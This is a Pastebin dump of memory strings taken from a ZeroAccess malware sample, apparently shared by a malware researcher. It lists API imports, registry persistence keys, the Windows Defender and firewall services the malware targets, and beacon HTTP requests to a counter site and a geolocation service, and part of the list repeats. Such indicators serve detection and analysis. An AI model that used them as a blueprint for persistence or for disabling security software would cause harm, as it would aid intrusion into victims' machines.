API tools faq
paste
Advertisement
MalwareMustDie

#MMD - ZeroAccess "contacts.exe" Memory snapped strings

MalwareMustDie
Feb 5th, 2013
1,515
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 31.43 KB | None | 0 0
raw download clone embed print report
  1. #MalwareMustDie - @unixfreaxjp /malware]$ date
  2. //Wed Feb 6 14:21:38 JST 2013
  3. // ZeroAccess "contacts.exe" Memory snapped strings
  4.  
  5. 0x00004F kernel32
  6. 0x00006D kernel32
  7. 0x000077 actioncenter
  8. 0x000085 wscntfy
  9. 0x00008E kernel32
  10. 0x0000B7 actioncenter
  11. 0x0000C5 wscntfy
  12. 0x0000CE kernel32
  13. 0x0000ED !This program cannot be run in DOS mode.
  14. 0x000117 Rich>
  15. 0x00011E .text
  16. 0x000126 .rdata
  17. 0x00012E @.data
  18. 0x000136 .reloc
  19. 0x00013E SVWj j
  20. 0x00016E PWWj j
  21. 0x000176 | WWWh
  22. 0x00018A |\VVj
  23. 0x000196 t5Hu7
  24. 0x0001AD tOWWj j
  25. 0x0001E7 4SSj!j
  26. 0x0001F5 Zj@YS3
  27. 0x000203 |mSSSS
  28. 0x00022C QQSVWjx
  29. 0x000235 QQSVW
  30. 0x00023C GNOL1
  31. 0x000254 PPPPPPPPj
  32. 0x000265 u8SWh
  33. 0x00026C u+SWh@
  34. 0x00028A WWWh4&@
  35. 0x0002B2 PVVVWj
  36. 0x0002C0 uCj@Xf
  37. 0x0002C8 XPVj j
  38. 0x0002EB PShF-@
  39. 0x00031F VVVVW
  40. 0x000332 nhcnct3
  41. 0x00033B QQSWj
  42. 0x000342 }Vhdisc3
  43. 0x000357 Shrecv
  44. 0x00035F hShsend
  45. 0x00036D =disc
  46. 0x000374 =send
  47. 0x00037B =cnctt
  48. 0x000382 =recvt
  49. 0x00038A u$Phu3@
  50. 0x000393 VWhsend
  51. 0x00039C hrecv
  52. 0x0003A8 sendt3
  53. 0x0003B0 recvt
  54. 0x0003BD <WVSU
  55. 0x0003C4 RtlInitUnicodeString
  56. 0x0003DA LdrLoadDll
  57. 0x0003E6 VirtualFree
  58. 0x0003F3 RtlAllocateActivationContextStack
  59. 0x000416 AQAPRQH
  60. 0x00041F (YZAXAY
  61. 0x000428 RtlInitUnicodeString
  62. 0x00043E AQAPRQH
  63. 0x000447 (YZAXAY
  64. 0x000450 LdrLoadDll
  65. 0x00045C VirtualFree
  66. 0x000469 RtlAllocateActivationContextStack
  67. 0x00048C x HcA<E3
  68. 0x0004A8 ZwAllocateVirtualMemory
  69. 0x0004C1 ZwProtectVirtualMemory
  70. 0x0004D9 RtlImageDirectoryEntryToData
  71. 0x0004F7 RtlInitUnicodeString
  72. 0x00050D LdrGetDllHandle
  73. 0x00051E _stricmp
  74. 0x000528 RtlAllocateActivationContextStack
  75. 0x00054B VirtualFree
  76. 0x000558 shell32.dll
  77. 0x000565 Shell_NotifyIconW
  78. 0x000583 u6j@h
  79. 0x00058A AQAPRQH
  80. 0x000593 (YZAXAY
  81. 0x00059C ZwAllocateVirtualMemory
  82. 0x0005B5 AQAPRQH
  83. 0x0005BE (YZAXAY
  84. 0x0005C7 ZwProtectVirtualMemory
  85. 0x0005DF AQAPRQH
  86. 0x0005E8 (YZAXAY
  87. 0x0005F1 RtlImageDirectoryEntryToData
  88. 0x00060F AQAPRQH
  89. 0x000618 (YZAXAY
  90. 0x000621 RtlInitUnicodeString
  91. 0x000637 AQAPRQH
  92. 0x000640 (YZAXAY
  93. 0x000649 LdrGetDllHandle
  94. 0x00065A AQAPRQH
  95. 0x000663 (YZAXAY
  96. 0x00066C _stricmp
  97. 0x000676 VirtualFree
  98. 0x000683 shell32.dll
  99. 0x000690 Shell_NotifyIconW
  100. 0x0006A3 RtlAllocateActivationContextStack
  101. 0x0006FA x HcA<E3
  102. 0x000721 ZwAllocateVirtualMemory
  103. 0x00073A ZwWriteVirtualMemory
  104. 0x000750 ZwFreeVirtualMemory
  105. 0x000765 ZwQuerySystemInformation
  106. 0x00077F ZwQueryInformationThread
  107. 0x000799 ZwOpenProcess
  108. 0x0007A8 ZwOpenThread
  109. 0x0007B6 ZwQueueApcThread
  110. 0x0007C8 ZwClose
  111. 0x0007D1 RtlEqualUnicodeString
  112. 0x0007E8 RtlInitUnicodeString
  113. 0x000803 AQAPRQH
  114. 0x00080C (YZAXAY
  115. 0x000815 ZwAllocateVirtualMemory
  116. 0x00082E AQAPRQH
  117. 0x000837 (YZAXAY
  118. 0x000840 ZwWriteVirtualMemory
  119. 0x000856 AQAPRQH
  120. 0x00085F (YZAXAY
  121. 0x000868 ZwQuerySystemInformation
  122. 0x000882 AQAPRQH
  123. 0x00088B (YZAXAY
  124. 0x000894 ZwQueryInformationThread
  125. 0x0008AE AQAPRQH
  126. 0x0008B7 (YZAXAY
  127. 0x0008C0 ZwOpenProcess
  128. 0x0008CF AQAPRQH
  129. 0x0008D8 (YZAXAY
  130. 0x0008E1 ZwOpenThread
  131. 0x0008EF AQAPRQH
  132. 0x0008F8 (YZAXAY
  133. 0x000901 ZwQueueApcThread
  134. 0x000913 AQAPRQH
  135. 0x00091C (YZAXAY
  136. 0x000925 ZwClose
  137. 0x00092E AQAPRQH
  138. 0x000937 (YZAXAY
  139. 0x000940 RtlEqualUnicodeString
  140. 0x000957 AQAPRQH
  141. 0x000960 (YZAXAY
  142. 0x000969 RtlInitUnicodeString
  143. 0x00097F AQAPRQH
  144. 0x000988 (YZAXAY
  145. 0x000991 ZwFreeVirtualMemory
  146. 0x0009A6 x ATAUAVH
  147. 0x0009B7 T$HE3
  148. 0x0009DD p WATAUAVAWH
  149. 0x0009F7 D$PA+
  150. 0x000A18 A]A\_
  151. 0x000A25 IcC<B
  152. 0x000A41 5MSCF
  153. 0x000A48 EB7F
  154. 0x000A4F fp.exe
  155. 0x000A57 wU;\:P
  156. 0x000A64 Kz'@r
  157. 0x000A70 a9%vV!
  158. 0x000A7E -puHO
  159. 0x000A85 !iA|x
  160. 0x000AB1 OZ(1w
  161. 0x000AC8 VK[5,Iz
  162. 0x000AFD Y9Jja
  163. 0x000B19 8AFg'"LE
  164. 0x000B2E q4UDq
  165. 0x000B35 GL OgB
  166. 0x000B43 FE1EE
  167. 0x000B67 HtQI=
  168. 0x000B84 NtUAV[v
  169. 0x000B95 LhNkh$Q
  170. 0x000BA3 fXbok
  171. 0x000BBA RyZ,{,0&{
  172. 0x000BC5 'Hk;Q
  173. 0x000BFB g~p=r
  174. 0x000C1D rQem4$
  175. 0x000C52 :TOzm
  176. 0x000C59 {jbA&f
  177. 0x000C70 rk8\~W
  178. 0x000C82 r61Dl.
  179. 0x000CA0 FD<@L3
  180. 0x000CB8 #K}jT
  181. 0x000CF2 f3mhn
  182. 0x000D14 W+<I|o
  183. 0x000D22 w7|Bt
  184. 0x000D2E F3in#
  185. 0x000D3A wq;j;f;
  186. 0x000D43 aVtGyZ[b
  187. 0x000D53 t)QFS[
  188. 0x000D60 ;Z7l3
  189. 0x000D78 &kzos
  190. 0x000D94 >;~vDe
  191. 0x000DA1 Qa3;v
  192. 0x000DAE 0eQTE
  193. 0x000DC1 G=[KE
  194. 0x000DCE 9NNx{6
  195. 0x000E3F 8YvV{J
  196. 0x000E47 B\eIS:a
  197. 0x000E76 +ruZ5
  198. 0x000E7D ht*&x
  199. 0x000E8F Oy)D7
  200. 0x000E9B 4M&eKD
  201. 0x000EA8 x_zDN
  202. 0x000EC0 v6FMkBT
  203. 0x000EC9 |y#nwC2
  204. 0x000ED7 b"'Wj
  205. 0x000F00 PEUU/r
  206. 0x000F08 l/xb"
  207. 0x000F1B ag&(g
  208. 0x000F22 F*JQT%
  209. 0x000F2A fCJ+U
  210. 0x000F4E t-cBT
  211. 0x000F72 jD0dPp
  212. 0x000F99 Y*9x8 d
  213. 0x000FA8 O7 > a.dc]W
  214. 0x000FE1 KnX6?
  215. 0x000FFD D's.P
  216. 0x001027 0tEB2Y
  217. 0x001039 F;Ans
  218. 0x00104B $X&sg
  219. 0x001052 rFcNC
  220. 0x001059 Q+nal
  221. 0x001076 J*BpCL
  222. 0x00107E "E~PxA
  223. 0x001091 gSh>H
  224. 0x001098 @Fx7d
  225. 0x00109F b}""QA
  226. 0x0010A7 :3;10wCY
  227. 0x0010B6 /Zv7Ye
  228. 0x0010BE 2BoDX
  229. 0x0010C5 at /7xO
  230. 0x0010E7 <o*+wI
  231. 0x0010F4 c@ufbc=c
  232. 0x00110E fV3:O{
  233. 0x001116 ma1 lB
  234. 0x001151 71cTK
  235. 0x001158 aw}!4O{+$
  236. 0x00116E ra. M
  237. 0x001185 r$@}Ad
  238. 0x00118D 44b=iBe:iFK
  239. 0x00119A gK-N/:
  240. 0x0011AC |>RxX\
  241. 0x0011BA 6pcg'
  242. 0x0011E3 .!E1hDFr
  243. 0x0011ED NnPbz<
  244. 0x0011F5 yyJX)
  245. 0x001211 &d_ad
  246. 0x001218 .]Qbd7
  247. 0x00122F fj<tT
  248. 0x001241 ZZ fa
  249. 0x001248 Z]8FhP
  250. 0x001260 <vZ;v
  251. 0x001271 MZh&{
  252. 0x00128C ZsAv]9
  253. 0x00129A ]]UyU
  254. 0x0012A7 9uS:O
  255. 0x0012CE w&V!m]bO
  256. 0x0012E3 Q&erb
  257. 0x00132A l\systemroot
  258. 0x001338 \BaseNamedObjects\{81D05F9A-5343-439f-ACAB-E7822E4416F9}
  259. 0x001372 A\??\ACPI#PNP0303#2&da1a3ff&0
  260. 0x001391 \BaseNamedObjects\Restricted\{A3D35150-6823-4462-8C6E-7417FF841D77}
  261. 0x0013D6 A\BaseNamedObjects\Restricted\{A3D35150-6823-4462-8C6E-7417FF841D78}
  262. 0x00141C AMicrosoft Base Cryptographic Provider v1.0
  263. 0x001449 \BaseNamedObjects\Restricted\{0C5AB9CD-2F90-6754-8374-21D4DAB28CC1}
  264. 0x00148E 2RECYCLER\
  265. 0x00149A $Recycle.Bin\
  266. 0x0014A9 \$%08x%04x%04x%02x%02x%02x%02x%02x%02x%02x%02x
  267. 0x0014D9 A%wZ\Software\Classes\clsid
  268. 0x0014F6 InprocServer32
  269. 0x001506 {fbeb8a05-beee-4442-804e-409d6c4515e9}
  270. 0x00152E AThreadingModel
  271. 0x00153F ABoth
  272. 0x001546 \registry\machine\Software\Classes\clsid\{5839fca9-774d-42a1-acda-d6a79037f57f}\InprocServer32
  273. 0x0015A6 explorer.exe
  274. 0x0015B4 services.exe
  275. 0x0015C8 TEMP=
  276. 0x0015CF \InstallFlashPlayer.exe
  277. 0x0015E8 \msimg32.dll
  278. 0x0015F6 \registry\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  279. 0x001637 AWindows Defender
  280. 0x00164A Awscntfy.exe
  281. 0x001658 AMSASCui.exe
  282. 0x001666 AMpCmdRun.exe
  283. 0x001675 ANisSrv.exe
  284. 0x001682 Amsseces.exe
  285. 0x001690 A\registry\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\ShellServiceObjects\{FD6905CE-952F-41F1-9A6F-135D9C6622CC}
  286. 0x001712 A\registry\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\ShellServiceObjects\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}
  287. 0x001794 AMsMpSvc
  288. 0x00179E windefend
  289. 0x0017A9 SharedAccess
  290. 0x0017B7 iphlpsvc
  291. 0x0017C1 wscsvc
  292. 0x0017C9 mpssvc
  293. 0x0017DC ATEMP=
  294. 0x0017E4 Arunas
  295. 0x0017EC @comspec=
  296. 0x001807 cfWk5
  297. 0x001829 ?[NGW+
  298. 0x00183A ~yuD8\
  299. 0x001848 t*T5B
  300. 0x00184F *VNyE
  301. 0x001860 MjC'9J+
  302. 0x001874 lJYLvF
  303. 0x001888 f;k5V
  304. 0x0018B3 ,v:Vw
  305. 0x0018C6 ve]PLo
  306. 0x0018F6 ~X[tY#
  307. 0x001903 Sv-e:#g:v
  308. 0x00191D XrEZ_
  309. 0x001933 z(ILj
  310. 0x001955 1}UQcJ
  311. 0x00195D 7lZlQQ
  312. 0x001965 ;TifK
  313. 0x001971 bY6#i
  314. 0x00198D rjW'~
  315. 0x00199E Kfb#HW
  316. 0x0019B0 i>?hz
  317. 0x0019C3 m _Nv0
  318. 0x0019CB 7uAUh
  319. 0x0019D2 PoQL,
  320. 0x0019D9 uNKzl
  321. 0x0019E0 d0|:Tw
  322. 0x0019ED [l2og
  323. 0x0019F4 Fu.z0QN
  324. 0x001A47 gY4[nLs
  325. 0x001A56 MhErw;:]
  326. 0x001A75 [N2gQ
  327. 0x001AB8 :s2oV
  328. 0x001AC4 dQU%m
  329. 0x001AD1 (L$Zj-l
  330. 0x001AF1 4M=h X_+Z
  331. 0x001B53 ?gOwN
  332. 0x001B7B ljMZJ
  333. 0x001B82 |X,$yFF
  334. 0x001B96 8rLb#
  335. 0x001B9D c)g!}T9
  336. 0x001BAB [vHL<
  337. 0x001BD8 VCWGl
  338. 0x001BF1 kD~S&
  339. 0x001BF8 !h0dHR
  340. 0x001C18 P|4GV
  341. 0x001C2F -w/I#JM
  342. 0x001C3E =O|nM
  343. 0x001C4A $lDa0+
  344. 0x001C5D ;TAP2!
  345. 0x001C71 $)4u0rp
  346. 0x001C7A *KA3Ax
  347. 0x001C91 ;TmAW
  348. 0x001C9E ~G%as
  349. 0x001CB1 kh'Z?
  350. 0x001CBE 9W~wi]
  351. 0x001CE1 B|.NYSt
  352. 0x001CEA 9si\hd
  353. 0x001D07 6Pz?LL
  354. 0x001D1B >{"UQE
  355. 0x001D25 ?UR"u
  356. 0x001D2C uFM =~<
  357. 0x001D40 R-r-F
  358. 0x001D58 O|ix7
  359. 0x001D64 <8x\O s
  360. 0x001D72 &M@Vt
  361. 0x001D8F Z :py
  362. 0x001D96 !,VSQ1_
  363. 0x001D9F rSYbA
  364. 0x001DAC 8IEzB
  365. 0x001DBE XK~Ox
  366. 0x001DC5 d@=Bz
  367. 0x001DCC mPexxN
  368. 0x001DE9 L3ECB
  369. 0x001DFD 7jx;{V
  370. 0x001E25 c8Bol
  371. 0x001E58 yoh(,-1
  372. 0x001E67 t|#IP
  373. 0x001E79 QGKPf
  374. 0x001EA6 Fbj-8
  375. 0x001EAD l{f|RD
  376. 0x001EC4 >w\j+E
  377. 0x001ECC RqKg\~
  378. 0x001ED4 SLJ:rL8
  379. 0x001EE2 O|DMH
  380. 0x001EE9 w{k{t{
  381. 0x001F07 n<c"R
  382. 0x001F1F [MH:i
  383. 0x001F2C Z<r:J
  384. 0x001F33 p0Za'
  385. 0x001F40 MqMJnMO
  386. 0x001F50 o-R[K
  387. 0x001F73 +vP'nUX
  388. 0x001F7C m/kS_
  389. 0x001F94 0vWcu>g
  390. 0x001FA2 _@B*gW
  391. 0x001FC1 /FLgwn
  392. 0x001FD5 cOo)}
  393. 0x001FDC s58Yz
  394. 0x001FE3 )BB=Jx
  395. 0x001FF1 ..rWF8
  396. 0x002009 \qAJt*
  397. 0x002028 Wh\{kD
  398. 0x002042 I[gCgH
  399. 0x002059 xk;#\=S0
  400. 0x002073 bNIo)08\
  401. 0x002082 K<<cw
  402. 0x0020A4 AWb<P'
  403. 0x0020FD t(FuJI
  404. 0x002112 nK*i:
  405. 0x00211E qPy-q
  406. 0x00212B MER/%
  407. 0x002138 |Po?Vp
  408. 0x002146 HY0{sP
  409. 0x00216C WZ}y'P
  410. 0x002174 X74KS
  411. 0x002186 o9beNs
  412. 0x00218E x2A:qA$
  413. 0x002197 dtllh
  414. 0x0021B9 d*D+H
  415. 0x0021CB ]yyyal
  416. 0x0021DD kuNi<
  417. 0x0021F4 -E,\_RS0
  418. 0x00220F a/.kvw
  419. 0x002246 j\0;wO
  420. 0x002259 Judn#
  421. 0x002260 JmmBAe
  422. 0x00226D MG<u~
  423. 0x00228B vJ-/xLQ2
  424. 0x0022A5 7ZHS3
  425. 0x0022B1 uh#Sib
  426. 0x0022BF SHELL32.dll
  427. 0x0022CC fp.exe
  428. 0x0022D4 GET /5699017-3C912481A04E584CDF231C519E1DF857/counter.img?theme=%u&digits=10&siteId=%u HTTP/1.1
  429. 0x002335 Host: bigfatcounters.com
  430. 0x00234F User-Agent: Opera/9 (Windows NT %u.%u; %s; %s)
  431. 0x00237F Connection: close
  432. 0x002392 GET /app/geoip.js HTTP/1.0
  433. 0x0023AE Host: j.maxmind.com
  434. 0x0023C3 Connection: close
  435. 0x0023D6 geoip_country_code
  436. 0x0023EA j.maxmind.com
  437. 0x0023F9 ShellExecuteExW
  438. 0x00240A memcpy
  439. 0x002412 ZwOpenFile
  440. 0x00241E ZwQueryVolumeInformationFile
  441. 0x00243C ZwClose
  442. 0x002445 ZwOpenEvent
  443. 0x002452 swprintf
  444. 0x00245C RtlInitUnicodeString
  445. 0x002472 RtlAdjustPrivilege
  446. 0x002486 ZwOpenProcessToken
  447. 0x00249A ZwQueryInformationToken
  448. 0x0024B3 ZwQueryInformationProcess
  449. 0x0024CE RtlRandomEx
  450. 0x0024DB ZwCreateEvent
  451. 0x0024EA ZwDelayExecution
  452. 0x0024FC ZwOpenThread
  453. 0x00250A ZwImpersonateThread
  454. 0x00251F ZwOpenThreadTokenEx
  455. 0x002534 ZwAdjustPrivilegesToken
  456. 0x00254D ZwQuerySystemInformation
  457. 0x002567 ZwWaitForSingleObject
  458. 0x00257E ZwAlertThread
  459. 0x00258D LdrFindEntryForAddress
  460. 0x0025A5 RtlDosPathNameToNtPathName_U
  461. 0x0025C3 ZwQueryEaFile
  462. 0x0025D2 RtlFreeUnicodeString
  463. 0x0025E8 ZwCreateFile
  464. 0x0025F6 RtlTimeToSecondsSince1980
  465. 0x002611 ZwWriteFile
  466. 0x00261E RtlAppendUnicodeToString
  467. 0x002638 RtlConvertSidToUnicodeString
  468. 0x002656 RtlFormatCurrentUserKeyPath
  469. 0x002673 ZwCreateKey
  470. 0x002680 ZwSetValueKey
  471. 0x00268F wcslen
  472. 0x002697 ZwOpenKey
  473. 0x0026A2 ZwSetSecurityObject
  474. 0x0026B7 memset
  475. 0x0026BF wcscat
  476. 0x0026C7 sprintf
  477. 0x0026D0 RtlComputeCrc32
  478. 0x0026E1 ZwDuplicateObject
  479. 0x0026F4 ZwDeleteKey
  480. 0x002701 ZwDeleteValueKey
  481. 0x002713 RtlEqualUnicodeString
  482. 0x00272A ZwOpenProcess
  483. 0x002739 ZwTerminateProcess
  484. 0x00274D ZwSuspendThread
  485. 0x00275E RtlGetCurrentPeb
  486. 0x002770 RtlPrefixUnicodeString
  487. 0x002788 wcscpy
  488. 0x002790 ZwQueryInformationFile
  489. 0x0027A8 ZwCreateSection
  490. 0x0027B9 ZwMapViewOfSection
  491. 0x0027CD ZwUnmapViewOfSection
  492. 0x0027E3 strcmp
  493. 0x0027EB RtlIpv4StringToAddressA
  494. 0x002804 ZwGetContextThread
  495. 0x002818 ZwSetInformationFile
  496. 0x00282E RtlExitUserThread
  497. 0x002841 ZwWriteVirtualMemory
  498. 0x002857 ZwSetContextThread
  499. 0x00286B ZwTerminateThread
  500. 0x00287E ZwResumeThread
  501. 0x00288E RtlInterlockedPushEntrySList
  502. 0x0028AC RtlInterlockedPopEntrySList
  503. 0x0028C9 RtlNtStatusToDosError
  504. 0x0028E0 ntdll.dll
  505. 0x0028EB GetVersion
  506. 0x0028F7 GetTickCount
  507. 0x002905 ExitProcess
  508. 0x002912 LocalAlloc
  509. 0x00291E LocalFree
  510. 0x002929 VirtualProtect
  511. 0x002939 Sleep
  512. 0x002940 ExitThread
  513. 0x00294C DisableThreadLibraryCalls
  514. 0x002967 CreateThread
  515. 0x002975 GetSystemTimeAsFileTime
  516. 0x00298E GetLastError
  517. 0x00299C CreateProcessW
  518. 0x0029AC BindIoCompletionCallback
  519. 0x0029C6 DeleteTimerQueueTimer
  520. 0x0029DD CreateTimerQueueTimer
  521. 0x0029F4 KERNEL32.dll
  522. 0x002A02 MD5Init
  523. 0x002A0B MD5Update
  524. 0x002A16 MD5Final
  525. 0x002A20 CryptAcquireContextW
  526. 0x002A36 CryptGenRandom
  527. 0x002A46 CryptReleaseContext
  528. 0x002A5B OpenServiceW
  529. 0x002A69 ControlService
  530. 0x002A79 ChangeServiceConfigW
  531. 0x002A8F DeleteService
  532. 0x002A9E CloseServiceHandle
  533. 0x002AB2 OpenSCManagerW
  534. 0x002AC2 ADVAPI32.dll
  535. 0x002AD0 Cabinet.dll
  536. 0x002ADD WSASocketW
  537. 0x002AE9 WSAIoctl
  538. 0x002AF3 WSARecv
  539. 0x002AFC WSASend
  540. 0x002B05 WSASendTo
  541. 0x002B10 WSARecvFrom
  542. 0x002B1D WS2_32.dll
  543. 0x002B29 GetProcAddress
  544. 0x002B39 FreeLibrary
  545. 0x002B46 InterlockedExchange
  546. 0x002B5B LoadLibraryA
  547. 0x002B69 RaiseException
  548. 0x002B79 uncrypted.exe
  549. 0x002B88 AlphaBlend
  550. 0x002B94 system32\msimg32.AlphaBlend
  551. 0x002BB1 GradientFill
  552. 0x002BBF system32\msimg32.GradientFill
  553. 0x002BDE TransparentBlt
  554. 0x002BEE system32\msimg32.TransparentBlt
  555. 0x002C1F 1+1>1D1K1Q1Z1a1
  556. 0x002C30 3 393?3F3L3_3m3s3
  557. 0x002C43 <'</<:<B<I<o<
  558. 0x002C52 >(>->@>F>O>s>
  559. 0x002C61 0E0\0l0y0
  560. 0x002C6C 5'5.555B5L5Y5f5s5
  561. 0x002C7F 6(686B6L6[6d6m6v6
  562. 0x002C92 7&7?7Y7h7p7u7
  563. 0x002CA1 8.878<8A8H8M8R8
  564. 0x002CB6 3R3Y3
  565. 0x002CBC 3f3n3
  566. 0x002CC3 4$4/454;4H4Q4[4h4
  567. 0x002CD6 7)7=7J7Q7Z7_7
  568. 0x002CE5 3$484L4P4T4X4\4
  569. 0x002D04 Wi|LE
  570. 0x002D1A _(wRz
  571. 0x002D27 OP*IZV_
  572. 0x002D35 pTsBL
  573. 0x002D51 =_cSZ
  574. 0x002D58 _cuMIr
  575. 0x002D6A k<6:Pb+
  576. 0x002D79 fI&rS
  577. 0x002D8F \(B]X
  578. 0x002DA2 0UgaX
  579. 0x002DA9 p{bjE
  580. 0x002DB6 rGS(#L
  581. 0x002DD8 d7OtX
  582. 0x002DE4 =awS/c
  583. 0x002E13 q*CD{
  584. 0x002E1A (n.Pf
  585. 0x002E27 3o-eHx
  586. 0x002E35 sW1,I
  587. 0x002E41 <Ul%M3RMF
  588. 0x002E68 M4g(+m
  589. 0x002E70 cpO=m
  590. 0x002E7D Lk@]kl}
  591. 0x002E8B V6H)rU
  592. 0x002E9E $dm,y
  593. 0x002EBA {YscG
  594. 0x002ECB !_cDh\
  595. 0x002ED8 Y'*OY
  596. 0x002EFF Bp A.3P1o
  597. 0x002F1A 4nC<n
  598. 0x002F49 pwz;YB
  599. 0x002F51 rz?DXs
  600. 0x002F59 A<atY
  601. 0x002F72 ww=rJ]
  602. 0x002F7A V}qJY
  603. 0x002F9D 2z(u*vr
  604. 0x002FAC kq{Al
  605. 0x002FB8 !8CFQ
  606. 0x002FCA +P5Yu
  607. 0x002FE8 TrK>Z
  608. 0x002FFA dm0\e
  609. 0x003030 Tv|E[
  610. 0x003042 HVL_:g
  611. 0x003088 'RpY~B S
  612. 0x00309C pwTP<
  613. 0x0030AD B"Jk!J
  614. 0x0030B5 JTFkb
  615. 0x0030C8 Ee\uV
  616. 0x0030CF ,nmI7
  617. 0x0030F4 1_kGCH&
  618. 0x003112 Xv?'E c"
  619. 0x00316B sboLr
  620. 0x003172 %p[y/a
  621. 0x003185 Oy~y.
  622. 0x003192 I~S;~t
  623. 0x00319A Us[ybr
  624. 0x0031BF Cc*lB
  625. 0x0031D9 ~_VvK
  626. 0x0031E6 0TIiHUE}
  627. 0x0031F0 xE(S|&
  628. 0x003209 nJ!Vc
  629. 0x003215 Z!3[wi
  630. 0x003234 sr+A}
  631. 0x00325B INY9Vh;W
  632. 0x00326A NL8#F-
  633. 0x00327D p"ZT+L
  634. 0x003295 /BT=Z
  635. 0x0032A1 [>G:oj5u
  636. 0x0032AB WgXPHi
  637. 0x0032D2 v}:PQ
  638. 0x0032D9 N*YnM
  639. 0x0032E6 ")dfo
  640. 0x0032F2 U~EQ@
  641. 0x0032F9 oTB)S
  642. 0x003316 kbOv7'
  643. 0x00333D jYA$Q
  644. 0x003357 E8p|c;
  645. 0x00336A YBbP:
  646. 0x003371 STMZF
  647. 0x003378 >XfaH
  648. 0x00337F TpIF.
  649. 0x003396 doFk;z
  650. 0x00339E Ewh@cX
  651. 0x0033AB 2oq(V
  652. 0x0033CD .bAp]
  653. 0x0033EE 8XBg+|#>
  654. 0x0033FE v>}Bt
  655. 0x00341C #PUj<
  656. 0x003423 z0kZG
  657. 0x00342F &GN\B
  658. 0x003441 s=VIT
  659. 0x003457 x:Ahz
  660. 0x00349C [jQf%
  661. 0x0034AD n"/HY
  662. 0x0034BC [n])gf
  663. 0x0034F0 ,GkTvO
  664. 0x0034F8 JTdtU%
  665. 0x003506 {W!!Fk
  666. 0x003514 b$&msB
  667. 0x003547 !F\DA
  668. 0x00355A WH;M]
  669. 0x003561 !8(<EbN9
  670. 0x00356B jO<qi
  671. 0x003578 ;NjhkUE
  672. 0x00358B L#Kkx
  673. 0x00359E =/Ej+nc
  674. 0x0035B5 u[R1?f
  675. 0x0035DE k@nfQ(
  676. 0x0035F2 ;Spmh=T
  677. 0x00360D virUe
  678. 0x003628 @\xfQK
  679. 0x003649 IbUgf
  680. 0x00367F utz;s.
  681. 0x0036A4 EDY/z
  682. 0x0036AB xYG Va
  683. 0x0036CA e.WXt
  684. 0x0036E1 c2RjY
  685. 0x0036E8 UDiFn
  686. 0x0036F4 a,&GQ{
  687. 0x003701 V#[.rU
  688. 0x003713 gPKec
  689. 0x00372A iCZt!
  690. 0x003747 /s~2l?4T
  691. 0x00004F kernel32
  692. 0x00006D kernel32
  693. 0x000077 actioncenter
  694. 0x000085 wscntfy
  695. 0x00008E kernel32
  696. 0x0000B7 actioncenter
  697. 0x0000C5 wscntfy
  698. 0x0000CE kernel32
  699. 0x0000ED !This program cannot be run in DOS mode.
  700. 0x000117 Rich>
  701. 0x00011E .text
  702. 0x000126 .rdata
  703. 0x00012E @.data
  704. 0x000136 .reloc
  705. 0x00013E SVWj j
  706. 0x00016E PWWj j
  707. 0x000176 | WWWh
  708. 0x00018A |\VVj
  709. 0x000196 t5Hu7
  710. 0x0001AD tOWWj j
  711. 0x0001E7 4SSj!j
  712. 0x0001F5 Zj@YS3
  713. 0x000203 |mSSSS
  714. 0x00022C QQSVWjx
  715. 0x000235 QQSVW
  716. 0x00023C GNOL1
  717. 0x000254 PPPPPPPPj
  718. 0x000265 u8SWh
  719. 0x00026C u+SWh@
  720. 0x00028A WWWh4&@
  721. 0x0002B2 PVVVWj
  722. 0x0002C0 uCj@Xf
  723. 0x0002C8 XPVj j
  724. 0x0002EB PShF-@
  725. 0x00031F VVVVW
  726. 0x000332 nhcnct3
  727. 0x00033B QQSWj
  728. 0x000342 }Vhdisc3
  729. 0x000357 Shrecv
  730. 0x00035F hShsend
  731. 0x00036D =disc
  732. 0x000374 =send
  733. 0x00037B =cnctt
  734. 0x000382 =recvt
  735. 0x00038A u$Phu3@
  736. 0x000393 VWhsend
  737. 0x00039C hrecv
  738. 0x0003A8 sendt3
  739. 0x0003B0 recvt
  740. 0x0003BD <WVSU
  741. 0x0003C4 RtlInitUnicodeString
  742. 0x0003DA LdrLoadDll
  743. 0x0003E6 VirtualFree
  744. 0x0003F3 RtlAllocateActivationContextStack
  745. 0x000416 AQAPRQH
  746. 0x00041F (YZAXAY
  747. 0x000428 RtlInitUnicodeString
  748. 0x00043E AQAPRQH
  749. 0x000447 (YZAXAY
  750. 0x000450 LdrLoadDll
  751. 0x00045C VirtualFree
  752. 0x000469 RtlAllocateActivationContextStack
  753. 0x00048C x HcA<E3
  754. 0x0004A8 ZwAllocateVirtualMemory
  755. 0x0004C1 ZwProtectVirtualMemory
  756. 0x0004D9 RtlImageDirectoryEntryToData
  757. 0x0004F7 RtlInitUnicodeString
  758. 0x00050D LdrGetDllHandle
  759. 0x00051E _stricmp
  760. 0x000528 RtlAllocateActivationContextStack
  761. 0x00054B VirtualFree
  762. 0x000558 shell32.dll
  763. 0x000565 Shell_NotifyIconW
  764. 0x000583 u6j@h
  765. 0x00058A AQAPRQH
  766. 0x000593 (YZAXAY
  767. 0x00059C ZwAllocateVirtualMemory
  768. 0x0005B5 AQAPRQH
  769. 0x0005BE (YZAXAY
  770. 0x0005C7 ZwProtectVirtualMemory
  771. 0x0005DF AQAPRQH
  772. 0x0005E8 (YZAXAY
  773. 0x0005F1 RtlImageDirectoryEntryToData
  774. 0x00060F AQAPRQH
  775. 0x000618 (YZAXAY
  776. 0x000621 RtlInitUnicodeString
  777. 0x000637 AQAPRQH
  778. 0x000640 (YZAXAY
  779. 0x000649 LdrGetDllHandle
  780. 0x00065A AQAPRQH
  781. 0x000663 (YZAXAY
  782. 0x00066C _stricmp
  783. 0x000676 VirtualFree
  784. 0x000683 shell32.dll
  785. 0x000690 Shell_NotifyIconW
  786. 0x0006A3 RtlAllocateActivationContextStack
  787. 0x0006FA x HcA<E3
  788. 0x000721 ZwAllocateVirtualMemory
  789. 0x00073A ZwWriteVirtualMemory
  790. 0x000750 ZwFreeVirtualMemory
  791. 0x000765 ZwQuerySystemInformation
  792. 0x00077F ZwQueryInformationThread
  793. 0x000799 ZwOpenProcess
  794. 0x0007A8 ZwOpenThread
  795. 0x0007B6 ZwQueueApcThread
  796. 0x0007C8 ZwClose
  797. 0x0007D1 RtlEqualUnicodeString
  798. 0x0007E8 RtlInitUnicodeString
  799. 0x000803 AQAPRQH
